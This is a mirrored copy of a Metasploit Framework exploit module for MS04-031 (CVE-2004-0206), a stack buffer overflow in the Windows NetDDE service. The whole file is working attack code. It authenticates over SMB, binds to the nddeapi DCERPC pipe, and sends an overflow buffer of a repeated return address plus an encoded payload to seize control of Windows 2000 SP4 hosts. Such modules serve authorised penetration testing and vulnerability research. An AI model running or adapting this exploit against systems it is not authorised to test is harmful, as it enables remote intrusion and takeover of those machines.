Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/smb/ms04_031_netdde.rb
19535 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::DCERPC

10
  include Msf::Exploit::Remote::SMB::Client

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'MS04-031 Microsoft NetDDE Service Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in the NetDDE service, which is the

19
          precursor to the DCOM interface.  This exploit effects only operating systems

20
          released prior to Windows XP SP1 (2000 SP4, XP SP0). Despite Microsoft's claim

21
          that this vulnerability can be exploited without authentication, the NDDEAPI

22
          pipe is only accessible after successful authentication.

23
        },

24
        'Author' => [ 'pusscat' ],

25
        'License' => BSD_LICENSE,

26
        'References' => [

27
          [ 'CVE', '2004-0206'],

28
          [ 'OSVDB', '10689'],

29
          [ 'BID', '11372'],

30
          [ 'MSB', 'MS04-031'],

31


32
        ],

33
        'Privileged' => true,

34
        'DefaultOptions' => {

35
          'EXITFUNC' => 'thread'

36
        },

37
        'Payload' => {

38
          'Space' => (0x600 - (133 * 4) - 4),

39
          'BadChars' => "\\/.:$\x00", # \ / . : $ NULL

40
          'Prepend' => 'A' * 8,

41
        },

42
        'Platform' => 'win',

43
        'Targets' => [

44
          [ 'Windows 2000 SP4', { 'Ret' => 0x77e56f43 } ], # push esp, ret :)

45
        ],

46
        'DefaultTarget' => 0,

47
        'DisclosureDate' => '2004-10-12',

48
        'Notes' => {

49
          'Reliability' => UNKNOWN_RELIABILITY,

50
          'Stability' => UNKNOWN_STABILITY,

51
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

52
        }

53
      )

54
    )

55


56
    register_options(

57
      [

58
        OptString.new('SMBPIPE', [ true, "The pipe name to use (nddeapi)", 'nddeapi']),

59
      ]

60
    )

61
  end

62


63
  def exploit

64
    connect()

65
    smb_login()

66
    print_status("Trying target #{target.name}...")

67


68
    handle = dcerpc_handle('2f5f3220-c126-1076-b549-074d078619da', '1.2', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])

69
    print_status("Binding to #{handle}")

70
    dcerpc_bind(handle)

71
    print_status("Bound to #{handle}")

72


73
    retOverWrite =

74
      'AA' + (NDR.long(target.ret) * 133) + payload.encoded

75


76
    overflowChunk =

77
      retOverWrite +

78
      NDR.long(0xCA7CA7) + # Mew. 3 bytes enter. 1 byte null.

79
      NDR.long(0x0)

80


81
    stubdata =

82
      NDR.UnicodeConformantVaryingStringPreBuilt(overflowChunk) +

83
      NDR.long(rand(0xFFFFFFFF))

84


85
    print_status('Calling the vulnerable function...')

86


87
    begin

88
      response = dcerpc.call(0xc, stubdata)

89
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse

90
    end

91


92
    handler

93
    disconnect

94
  end

95
end

96


97